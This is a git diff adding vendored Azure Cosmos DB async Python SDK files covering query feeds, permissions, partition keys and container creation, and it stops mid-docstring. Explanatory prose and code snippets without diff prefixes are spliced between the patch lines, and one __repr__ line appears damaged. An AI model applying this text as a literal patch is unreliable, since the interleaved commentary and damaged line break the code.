+            options = {}
+
+        return self.QueryPermissions(user_link, None, options, **kwargs)
+
+    def QueryPermissions(self, user_link, query, options=None, **kwargs):
+        """Queries permissions for a user.
+
+        :param str user_link:
+            The link to the user entity.
+        :param (str or dict) query:
+        :param dict options:
+            The request options for the request.
+
+        :return:
+            Query Iterable of Permissions.
+        :rtype:
+            query_iterable.QueryIterable
+
+        """
+        if options is None:
+            options = {}
+
+        path = base.GetPathFromLink(user_link, "permissions")
+        user_id = base.GetResourceIdOrFullNameFromLink(user_link)
+
+        async def fetch_fn(options):
+            return (
+                await self.__QueryFeed(
+                    path, "permissions", user_id, lambda r: r["Permissions"], lambda _, b: b, query, options, **kwargs
+                ),
+                self.last_response_headers,
+            )
+
+        return AsyncItemPaged(
+            self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable
+        )
+
+    def ReadStoredProcedures(self, collection_link, options=None, **kwargs):
+        """Reads all stored procedures in a collection.
+
+        :param str collection_link:
+            The link to the document collection.
+        :param dict options:
+            The request options for the request.
+
+        :return:
+            Query Iterable of Stored Procedures.
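Wherever these methods document a `(str or dict) query`, both a plain SQL string and the parameterized dict form are accepted; the dict form is what `__CheckAndUnifyQueryFormat` (further below) normalizes to. A small illustration, with invented query text and parameter names:

    # Plain text form -- the SDK wraps this into {"query": ...} internally.
    plain_query = "SELECT * FROM root r WHERE r.id = 'user1'"

    # Parameterized dict form, safer when values come from user input.
    parameterized_query = {
        "query": "SELECT * FROM root r WHERE r.id = @id",
        "parameters": [{"name": "@id", "value": "user1"}],
    }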
+ :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryStoredProcedures(collection_link, None, options, **kwargs) + + def QueryStoredProcedures(self, collection_link, query, options=None, **kwargs): + """Queries stored procedures in a collection. + + :param str collection_link: + The link to the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of Stored Procedures. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link, "sprocs") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + async def fetch_fn(options): + return ( + await self.__QueryFeed( + path, "sprocs", collection_id, lambda r: r["StoredProcedures"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return AsyncItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReadTriggers(self, collection_link, options=None, **kwargs): + """Reads all triggers in a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + Query Iterable of Triggers. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryTriggers(collection_link, None, options, **kwargs) + + def QueryTriggers(self, collection_link, query, options=None, **kwargs): + """Queries triggers in a collection. + + :param str collection_link: + The link to the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of Triggers. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link, "triggers") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + async def fetch_fn(options): + return ( + await self.__QueryFeed( + path, "triggers", collection_id, lambda r: r["Triggers"], lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return AsyncItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReadUserDefinedFunctions(self, collection_link, options=None, **kwargs): + """Reads all user-defined functions in a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + Query Iterable of UDFs. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryUserDefinedFunctions(collection_link, None, options, **kwargs) + + def QueryUserDefinedFunctions(self, collection_link, query, options=None, **kwargs): + """Queries user-defined functions in a collection. + + :param str collection_link: + The link to the collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of UDFs. 
+        :rtype:
+            query_iterable.QueryIterable
+
+        """
+        if options is None:
+            options = {}
+
+        path = base.GetPathFromLink(collection_link, "udfs")
+        collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+
+        async def fetch_fn(options):
+            return (
+                await self.__QueryFeed(
+                    path, "udfs", collection_id, lambda r: r["UserDefinedFunctions"],
+                    lambda _, b: b, query, options, **kwargs
+                ),
+                self.last_response_headers,
+            )
+
+        return AsyncItemPaged(
+            self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable
+        )
+
+    def ReadConflicts(self, collection_link, feed_options=None, **kwargs):
+        """Reads conflicts.
+
+        :param str collection_link:
+            The link to the document collection.
+        :param dict feed_options:
+
+        :return:
+            Query Iterable of Conflicts.
+        :rtype:
+            query_iterable.QueryIterable
+
+        """
+        if feed_options is None:
+            feed_options = {}
+
+        return self.QueryConflicts(collection_link, None, feed_options, **kwargs)
+
+    def QueryConflicts(self, collection_link, query, options=None, **kwargs):
+        """Queries conflicts in a collection.
+
+        :param str collection_link:
+            The link to the document collection.
+        :param (str or dict) query:
+        :param dict options:
+            The request options for the request.
+
+        :return:
+            Query Iterable of Conflicts.
+        :rtype:
+            query_iterable.QueryIterable
+
+        """
+        if options is None:
+            options = {}
+
+        path = base.GetPathFromLink(collection_link, "conflicts")
+        collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+
+        async def fetch_fn(options):
+            return (
+                await self.__QueryFeed(
+                    path, "conflicts", collection_id, lambda r: r["Conflicts"],
+                    lambda _, b: b, query, options, **kwargs
+                ),
+                self.last_response_headers,
+            )
+
+        return AsyncItemPaged(
+            self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable
+        )
+
+    async def QueryFeed(self, path, collection_id, query, options, partition_key_range_id=None, **kwargs):
+        """Query Feed for Document Collection resource.
+
+        :param str path:
+            Path to the document collection.
+        :param str collection_id:
+            Id of the document collection.
+        :param (str or dict) query:
+        :param dict options:
+            The request options for the request.
+        :param str partition_key_range_id:
+            Partition key range id.
+        :rtype:
+            tuple
+
+        """
+        return (
+            await self.__QueryFeed(
+                path,
+                "docs",
+                collection_id,
+                lambda r: r["Documents"],
+                lambda _, b: b,
+                query,
+                options,
+                partition_key_range_id,
+                **kwargs
+            ),
+            self.last_response_headers,
+        )
+
+    async def __QueryFeed(
+        self,
+        path,
+        typ,
+        id_,
+        result_fn,
+        create_fn,
+        query,
+        options=None,
+        partition_key_range_id=None,
+        response_hook=None,
+        is_query_plan=False,
+        **kwargs
+    ):
+        """Query for more than one Azure Cosmos resource.
+
+        :param str path:
+        :param str typ:
+        :param str id_:
+        :param function result_fn:
+        :param function create_fn:
+        :param (str or dict) query:
+        :param dict options:
+            The request options for the request.
+        :param str partition_key_range_id:
+            Specifies partition key range id.
+        :param function response_hook:
+        :param bool is_query_plan:
+            Specifies whether the call is to fetch the query plan
+
+        :rtype:
+            list
+
+        :raises SystemError: If the query compatibility mode is undefined.
+
+        """
+        if options is None:
+            options = {}
+
+        if query:
+            __GetBodiesFromQueryResult = result_fn
+        else:
+
+            def __GetBodiesFromQueryResult(result):
+                if result is not None:
+                    return [create_fn(self, body) for body in result_fn(result)]
+                # If there is no change feed, the result data is empty and result is None.
+                # This case should be interpreted as an empty array.
+                return []
+
+        initial_headers = self.default_headers.copy()
+        # Copy to make sure that default_headers won't be changed.
+        if query is None:
+            # Query operations will use ReadEndpoint even though it uses GET (for feed requests)
+            request_params = _request_object.RequestObject(typ,
+                documents._OperationType.QueryPlan if is_query_plan else documents._OperationType.ReadFeed)
+            headers = base.GetHeaders(self, initial_headers, "get", path, id_, typ, options, partition_key_range_id)
+            result, self.last_response_headers = await self.__Get(path, request_params, headers, **kwargs)
+            if response_hook:
+                response_hook(self.last_response_headers, result)
+            return __GetBodiesFromQueryResult(result)
+
+        query = self.__CheckAndUnifyQueryFormat(query)
+
+        if not is_query_plan:
+            initial_headers[http_constants.HttpHeaders.IsQuery] = "true"
+
+        if (
+            self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Default
+            or self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Query
+        ):
+            initial_headers[http_constants.HttpHeaders.ContentType] = runtime_constants.MediaTypes.QueryJson
+        elif self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.SqlQuery:
+            initial_headers[http_constants.HttpHeaders.ContentType] = runtime_constants.MediaTypes.SQL
+        else:
+            raise SystemError("Unexpected query compatibility mode.")
+
+        # Query operations will use ReadEndpoint even though it uses POST (for regular query operations)
+        request_params = _request_object.RequestObject(typ, documents._OperationType.SqlQuery)
+        req_headers = base.GetHeaders(self, initial_headers, "post", path, id_, typ, options, partition_key_range_id)
+        result, self.last_response_headers = await self.__Post(path, request_params, query, req_headers, **kwargs)
+
+        if response_hook:
+            response_hook(self.last_response_headers, result)
+
+        return __GetBodiesFromQueryResult(result)
+
+    def __CheckAndUnifyQueryFormat(self, query_body):
+        """Checks and unifies the format of the query body.
+
+        :raises TypeError: If query_body is not of the expected type (depending on the query compatibility mode).
+        :raises ValueError: If query_body is a dict but doesn't have valid query text.
+        :raises SystemError: If the query compatibility mode is undefined.
+
+        :param (str or dict) query_body:
+
+        :return:
+            The formatted query body.
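A standalone restatement of the normalization that `__CheckAndUnifyQueryFormat` performs in the default/Query compatibility modes. This is a simplified sketch, not the SDK's actual function:

    def unify_query_format(query_body):
        # Plain SQL text is wrapped into the dict form; dicts must carry "query" text.
        if isinstance(query_body, str):
            return {"query": query_body}
        if isinstance(query_body, dict) and query_body.get("query"):
            return query_body
        raise ValueError('query body must be SQL text or a dict with a "query" key')

    assert unify_query_format("SELECT * FROM c") == {"query": "SELECT * FROM c"}
    assert unify_query_format({"query": "SELECT * FROM c"}) == {"query": "SELECT * FROM c"}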
+        :rtype:
+            dict or string
+        """
+        if (
+            self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Default
+            or self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Query
+        ):
+            if not isinstance(query_body, dict) and not isinstance(query_body, str):
+                raise TypeError("query body must be a dict or string.")
+            if isinstance(query_body, dict) and not query_body.get("query"):
+                raise ValueError('query body must have valid query text with key "query".')
+            if isinstance(query_body, str):
+                return {"query": query_body}
+        elif self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.SqlQuery:
+            if not isinstance(query_body, str):
+                raise TypeError("query body must be a string.")
+        else:
+            raise SystemError("Unexpected query compatibility mode.")
+
+        return query_body
+
+    def _UpdateSessionIfRequired(self, request_headers, response_result, response_headers):
+        """
+        Updates the session if necessary.
+
+        :param dict request_headers:
+        :param dict response_result:
+        :param dict response_headers:
+
+        :return:
+            None, but updates the client session if necessary.
+
+        """
+
+        # if this request was made with consistency level as session, then update the session
+        if response_result is None or response_headers is None:
+            return
+
+        is_session_consistency = False
+        if http_constants.HttpHeaders.ConsistencyLevel in request_headers:
+            if documents.ConsistencyLevel.Session == request_headers[http_constants.HttpHeaders.ConsistencyLevel]:
+                is_session_consistency = True
+
+        if is_session_consistency:
+            # update session
+            self.session.update_session(response_result, response_headers)
+
+    PartitionResolverErrorMessage = (
+        "Couldn't find any partition resolvers for the database link provided. "
+        + "Ensure that the link you used when registering the partition resolvers "
+        + "matches the link provided or you need to register both types of database "
+        + "link (self link as well as ID based link)."
+ ) + + # Gets the collection id and path for the document + def _GetContainerIdWithPathForItem(self, database_or_container_link, document, options): + + if not database_or_container_link: + raise ValueError("database_or_container_link is None or empty.") + + if document is None: + raise ValueError("document is None.") + + CosmosClientConnection.__ValidateResource(document) + document = document.copy() + if not document.get("id") and not options.get("disableAutomaticIdGeneration"): + document["id"] = base.GenerateGuidId() + + collection_link = database_or_container_link + + if base.IsDatabaseLink(database_or_container_link): + partition_resolver = self.GetPartitionResolver(database_or_container_link) + + if partition_resolver is not None: + collection_link = partition_resolver.ResolveForCreate(document) + else: + raise ValueError(CosmosClientConnection.PartitionResolverErrorMessage) + + path = base.GetPathFromLink(collection_link, "docs") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return collection_id, document, path + + def _GetUserIdWithPathForPermission(self, permission, user_link): # pylint: disable=no-self-use + CosmosClientConnection.__ValidateResource(permission) + path = base.GetPathFromLink(user_link, "permissions") + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + return path, user_id + + def RegisterPartitionResolver(self, database_link, partition_resolver): + """Registers the partition resolver associated with the database link + + :param str database_link: + Database Self Link or ID based link. + :param object partition_resolver: + An instance of PartitionResolver. + + """ + if not database_link: + raise ValueError("database_link is None or empty.") + + if partition_resolver is None: + raise ValueError("partition_resolver is None.") + + self.partition_resolvers = {base.TrimBeginningAndEndingSlashes(database_link): partition_resolver} + + def GetPartitionResolver(self, database_link): + """Gets the partition resolver associated with the database link + + :param str database_link: + Database self link or ID based link. + + :return: + An instance of PartitionResolver. 
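Any object exposing a `ResolveForCreate(document)` method satisfies the resolver contract that `RegisterPartitionResolver` stores. A toy hash-based resolver, with invented collection links, as one possible shape:

    class HashPartitionResolver:
        # Toy resolver: routes documents to collections by hashing their id.
        def __init__(self, collection_links):
            self.collection_links = collection_links

        def ResolveForCreate(self, document):
            index = hash(document["id"]) % len(self.collection_links)
            return self.collection_links[index]

    resolver = HashPartitionResolver(["dbs/db1/colls/c0", "dbs/db1/colls/c1"])
    print(resolver.ResolveForCreate({"id": "item-42"}))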
+        :rtype: object
+
+        """
+        if not database_link:
+            raise ValueError("database_link is None or empty.")
+
+        return self.partition_resolvers.get(base.TrimBeginningAndEndingSlashes(database_link))
+
+    # Adds the partition key to options
+    async def _AddPartitionKey(self, collection_link, document, options):
+        collection_link = base.TrimBeginningAndEndingSlashes(collection_link)
+
+        # TODO: Refresh the cache if partition is extracted automatically and we get a 400.1001
+
+        # If the document collection link is present in the cache, then use the cached partition key definition
+        if collection_link in self.partition_key_definition_cache:
+            partitionKeyDefinition = self.partition_key_definition_cache.get(collection_link)
+        # Else read the collection from the backend and add it to the cache
+        else:
+            collection = await self.ReadContainer(collection_link)
+            partitionKeyDefinition = collection.get("partitionKey")
+            self.partition_key_definition_cache[collection_link] = partitionKeyDefinition
+
+        # If the collection doesn't have a partition key definition, skip it as it's a legacy collection
+        if partitionKeyDefinition:
+            # If the user has passed in the partitionKey in options, use that; else extract it from the document
+            if "partitionKey" not in options:
+                partitionKeyValue = self._ExtractPartitionKey(partitionKeyDefinition, document)
+                options["partitionKey"] = partitionKeyValue
+
+        return options
+
+    # Extracts the partition key from the document using the partitionKey definition
+    def _ExtractPartitionKey(self, partitionKeyDefinition, document):
+
+        # Parses the paths into a list of tokens, each representing a property
+        partition_key_parts = base.ParsePaths(partitionKeyDefinition.get("paths"))
+        # Check if the partitionKey is system generated or not
+        is_system_key = partitionKeyDefinition["systemKey"] if "systemKey" in partitionKeyDefinition else False
+
+        # Navigates the document to retrieve the partitionKey specified in the paths
+        return self._retrieve_partition_key(partition_key_parts, document, is_system_key)
+
+    # Navigates the document to retrieve the partitionKey specified in the partition key parts
+    def _retrieve_partition_key(self, partition_key_parts, document, is_system_key):
+        expected_matchCount = len(partition_key_parts)
+        matchCount = 0
+        partitionKey = document
+
+        for part in partition_key_parts:
+            # At any point, if we don't find the value of a sub-property in the document, we return Undefined
+            if part not in partitionKey:
+                return self._return_undefined_or_empty_partition_key(is_system_key)
+
+            partitionKey = partitionKey.get(part)
+            matchCount += 1
+            # Once we reach the "leaf" value (not a dict), we break from the loop
+            if not isinstance(partitionKey, dict):
+                break
+
+        # Match the count of hops we did to get the partitionKey with the length of
+        # the partition key parts and validate that it's not a dict at that level
+        if (matchCount != expected_matchCount) or isinstance(partitionKey, dict):
+            return self._return_undefined_or_empty_partition_key(is_system_key)
+
+        return partitionKey
+
+    def refresh_routing_map_provider(self):
+        # re-initializes the routing map provider, effectively refreshing the current partition key range cache
+        self._routing_map_provider = routing_map_provider.SmartRoutingMapProvider(self)
+
+    async def _GetQueryPlanThroughGateway(self, query, resource_link, **kwargs):
+        supported_query_features = (documents._QueryFeature.Aggregate + "," +
+                                    documents._QueryFeature.CompositeAggregate + "," +
+                                    documents._QueryFeature.Distinct + "," +
+
documents._QueryFeature.MultipleOrderBy + "," + + documents._QueryFeature.OffsetAndLimit + "," + + documents._QueryFeature.OrderBy + "," + + documents._QueryFeature.Top) + + options = { + "contentType": runtime_constants.MediaTypes.Json, + "isQueryPlanRequest": True, + "supportedQueryFeatures": supported_query_features, + "queryVersion": http_constants.Versions.QueryVersion + } + + resource_link = base.TrimBeginningAndEndingSlashes(resource_link) + path = base.GetPathFromLink(resource_link, "docs") + resource_id = base.GetResourceIdOrFullNameFromLink(resource_link) + + return await self.__QueryFeed(path, + "docs", + resource_id, + lambda r: r, + None, + query, + options, + is_query_plan=True, + **kwargs) + + @staticmethod + def _return_undefined_or_empty_partition_key(is_system_key): + if is_system_key: + return _Empty + return _Undefined + + @staticmethod + def __ValidateResource(resource): + id_ = resource.get("id") + if id_: + try: + if id_.find("/") != -1 or id_.find("\\") != -1 or id_.find("?") != -1 or id_.find("#") != -1: + raise ValueError("Id contains illegal chars.") + + if id_[-1] == " ": + raise ValueError("Id ends with a space.") + except AttributeError: + raise_with_traceback(TypeError, message="Id type must be a string.") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_database.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_database.py new file mode 100644 index 0000000..1289c40 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_database.py @@ -0,0 +1,785 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Interact with databases in the Azure Cosmos DB SQL API service. 
+""" + +from typing import Any, Dict, Union, cast + +import warnings +from azure.core.async_paging import AsyncItemPaged +from azure.core.tracing.decorator_async import distributed_trace_async +from azure.core.tracing.decorator import distributed_trace + +from ._cosmos_client_connection_async import CosmosClientConnection +from .._base import build_options as _build_options +from ._container import ContainerProxy +from ..offer import ThroughputProperties +from ..http_constants import StatusCodes +from ..exceptions import CosmosResourceNotFoundError +from ._user import UserProxy +from ..documents import IndexingMode +from ..partition_key import PartitionKey + +__all__ = ("DatabaseProxy",) + + +# pylint: disable=protected-access +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + +class DatabaseProxy(object): + """An interface to interact with a specific database. + + This class should not be instantiated directly. Instead use the + :func:`~azure.cosmos.aio.cosmos_client.CosmosClient.get_database_client` method to get an existing + database, or the :func:`~azure.cosmos.aio.cosmos_client.CosmosClient.create_database` method to create + a new database. + + A database contains one or more containers, each of which can contain items, + stored procedures, triggers, and user-defined functions. + + A database can also have associated users, each of which is configured with + a set of permissions for accessing certain containers, stored procedures, + triggers, user-defined functions, or items. + + :ivar id: The ID (name) of the database. + + An Azure Cosmos DB SQL API database has the following system-generated + properties. These properties are read-only: + + * `_rid`: The resource ID. + * `_ts`: When the resource was last updated. The value is a timestamp. + * `_self`: The unique addressable URI for the resource. + * `_etag`: The resource etag required for optimistic concurrency control. + * `_colls`: The addressable path of the collections resource. + * `_users`: The addressable path of the users resource. + """ + + def __init__( + self, + client_connection: CosmosClientConnection, + id: str, # pylint: disable=redefined-builtin + properties: Dict[str, Any] = None + ) -> None: + """ + :param client_connection: Client from which this database was retrieved. + :type client_connection: ~azure.cosmos.aio.CosmosClientConnection + :param str id: ID (name) of the database. 
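A `DatabaseProxy` is normally obtained from the client rather than constructed directly. A short usage sketch with placeholder endpoint, key, and database name:

    import asyncio
    from azure.cosmos.aio import CosmosClient

    async def main():
        # get_database_client returns a DatabaseProxy without a network call;
        # properties are fetched lazily on read().
        async with CosmosClient(
            "https://<account>.documents.azure.com:443/", credential="<key>"  # placeholders
        ) as client:
            database = client.get_database_client("mydb")  # hypothetical name
            props = await database.read()
            print(props["id"])

    asyncio.run(main())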
+ """ + self.client_connection = client_connection + self.id = id + self.database_link = u"dbs/{}".format(self.id) + self._properties = properties + + def __repr__(self) -> str: + return "".format(self.database_link)[:1024] + + @staticmethod + def _get_container_id(container_or_id: Union[str, ContainerProxy, Dict[str, Any]]) -> str: + if isinstance(container_or_id, str): + return container_or_id + try: + return cast("ContainerProxy", container_or_id).id + except AttributeError: + pass + return cast("Dict[str, str]", container_or_id)["id"] + + def _get_container_link(self, container_or_id: Union[str, ContainerProxy, Dict[str, Any]]) -> str: + return u"{}/colls/{}".format(self.database_link, self._get_container_id(container_or_id)) + + def _get_user_link(self, user_or_id: Union[UserProxy, str, Dict[str, Any]]) -> str: + if isinstance(user_or_id, str): + return u"{}/users/{}".format(self.database_link, user_or_id) + try: + return cast("UserProxy", user_or_id).user_link + except AttributeError: + pass + return u"{}/users/{}".format(self.database_link, cast("Dict[str, str]", user_or_id)["id"]) + + async def _get_properties(self) -> Dict[str, Any]: + if self._properties is None: + self._properties = await self.read() + return self._properties + + @distributed_trace_async + async def read(self, **kwargs: Any) -> Dict[str, Any]: + """Read the database properties. + + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given database couldn't be retrieved. + :returns: A dict representing the database properties + :rtype: Dict[str, Any] + """ + # TODO this helper function should be extracted from CosmosClient + from ._cosmos_client import CosmosClient + + database_link = CosmosClient._get_database_link(self) + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + self._properties = await self.client_connection.ReadDatabase( + database_link, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, self._properties) + + return cast('Dict[str, Any]', self._properties) + + @distributed_trace_async + async def create_container( + self, + id: str, # pylint: disable=redefined-builtin + partition_key: PartitionKey, + **kwargs: Any + ) -> ContainerProxy: + """Create a new container with the given ID (name). + + If a container with the given ID already exists, a CosmosResourceExistsError is raised. + + :param str id: ID (name) of container to create. + :param partition_key: The partition key to use for the container. + :type partition_key: ~azure.cosmos.partition_key.PartitionKey + :keyword dict[str, str] indexing_policy: The indexing policy to apply to the container. + :keyword int default_ttl: Default time to live (TTL) for items in the container. + If unspecified, items do not expire. + :keyword int offer_throughput: The provisioned throughput for this offer. + :keyword dict[str, str] unique_key_policy: The unique key policy to apply to the container. + :keyword dict[str, str] conflict_resolution_policy: The conflict resolution policy to apply to the container. + :keyword str session_token: Token for use with Session consistency. 
+ :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :keyword int analytical_storage_ttl: Analytical store time to live (TTL) for items in the container. A value of + None leaves analytical storage off and a value of -1 turns analytical storage on with no TTL. Please + note that analytical storage can only be enabled on Synapse Link enabled accounts. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The container creation failed. + :returns: A `ContainerProxy` instance representing the new container. + :rtype: ~azure.cosmos.aio.ContainerProxy + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START create_container] + :end-before: [END create_container] + :language: python + :dedent: 0 + :caption: Create a container with default settings: + :name: create_container + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START create_container_with_settings] + :end-before: [END create_container_with_settings] + :language: python + :dedent: 0 + :caption: Create a container with specific settings; in this case, a custom partition key: + :name: create_container_with_settings + """ + definition: Dict[str, Any] = dict(id=id) + if partition_key is not None: + definition["partitionKey"] = partition_key + indexing_policy = kwargs.pop('indexing_policy', None) + if indexing_policy is not None: + if indexing_policy.get("indexingMode") is IndexingMode.Lazy: + warnings.warn( + "Lazy indexing mode has been deprecated. 
Mode will be set to consistent indexing by the backend.", + DeprecationWarning + ) + definition["indexingPolicy"] = indexing_policy + default_ttl = kwargs.pop('default_ttl', None) + if default_ttl is not None: + definition["defaultTtl"] = default_ttl + unique_key_policy = kwargs.pop('unique_key_policy', None) + if unique_key_policy is not None: + definition["uniqueKeyPolicy"] = unique_key_policy + conflict_resolution_policy = kwargs.pop('conflict_resolution_policy', None) + if conflict_resolution_policy is not None: + definition["conflictResolutionPolicy"] = conflict_resolution_policy + analytical_storage_ttl = kwargs.pop("analytical_storage_ttl", None) + if analytical_storage_ttl is not None: + definition["analyticalStorageTtl"] = analytical_storage_ttl + + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + offer_throughput = kwargs.pop('offer_throughput', None) + if offer_throughput is not None: + request_options["offerThroughput"] = offer_throughput + + data = await self.client_connection.CreateContainer( + database_link=self.database_link, collection=definition, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, data) + + return ContainerProxy(self.client_connection, self.database_link, data["id"], properties=data) + + @distributed_trace_async + async def create_container_if_not_exists( + self, + id: str, # pylint: disable=redefined-builtin + partition_key: PartitionKey, + **kwargs: Any + ) -> ContainerProxy: + """Create a container if it does not exist already. + + If the container already exists, the existing settings are returned. + Note: it does not check or update the existing container settings or offer throughput + if they differ from what was passed into the method. + + :param str id: ID (name) of container to create. + :param partition_key: The partition key to use for the container. + :type partition_key: ~azure.cosmos.partition_key.PartitionKey + :keyword dict[str, str] indexing_policy: The indexing policy to apply to the container. + :keyword int default_ttl: Default time to live (TTL) for items in the container. + If unspecified, items do not expire. + :keyword int offer_throughput: The provisioned throughput for this offer. + :keyword dict[str, str] unique_key_policy: The unique key policy to apply to the container. + :keyword dict[str, str] conflict_resolution_policy: The conflict resolution policy to apply to the container. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :keyword int analytical_storage_ttl: Analytical store time to live (TTL) for items in the container. A value of + None leaves analytical storage off and a value of -1 turns analytical storage on with no TTL. Please + note that analytical storage can only be enabled on Synapse Link enabled accounts. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The container creation failed. 
+ :returns: A `ContainerProxy` instance representing the new container. + :rtype: ~azure.cosmos.aio.ContainerProxy + """ + + try: + container_proxy = self.get_container_client(id) + await container_proxy.read(**kwargs) + return container_proxy + except CosmosResourceNotFoundError: + indexing_policy = kwargs.pop('indexing_policy', None) + default_ttl = kwargs.pop('default_ttl', None) + unique_key_policy = kwargs.pop('unique_key_policy', None) + conflict_resolution_policy = kwargs.pop('conflict_resolution_policy', None) + analytical_storage_ttl = kwargs.pop("analytical_storage_ttl", None) + offer_throughput = kwargs.pop('offer_throughput', None) + response_hook = kwargs.pop('response_hook', None) + return await self.create_container( + id=id, + partition_key=partition_key, + indexing_policy=indexing_policy, + default_ttl=default_ttl, + offer_throughput=offer_throughput, + unique_key_policy=unique_key_policy, + conflict_resolution_policy=conflict_resolution_policy, + analytical_storage_ttl=analytical_storage_ttl, + response_hook=response_hook + ) + + def get_container_client(self, container: Union[str, ContainerProxy, Dict[str, Any]]) -> ContainerProxy: + """Get a `ContainerProxy` for a container with specified ID (name). + + :param container: The ID (name), dict representing the properties, or :class:`ContainerProxy` + instance of the container to get. + :type container: Union[str, Dict[str, Any], ~azure.cosmos.aio.ContainerProxy] + :returns: A `ContainerProxy` instance representing the container. + :rtype: ~azure.cosmos.aio.ContainerProxy + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START get_container] + :end-before: [END get_container] + :language: python + :dedent: 0 + :caption: Get an existing container, handling a failure if encountered: + :name: get_container + """ + + try: + id_value = container.id + except AttributeError: + try: + id_value = container['id'] + except TypeError: + id_value = container + + return ContainerProxy(self.client_connection, self.database_link, id_value) + + @distributed_trace + def list_containers( + self, + **kwargs + ) -> AsyncItemPaged[Dict[str, Any]]: + """List the containers in the database. + + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + :returns: An AsyncItemPaged of container properties (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + + .. admonition:: Example: + + .. 
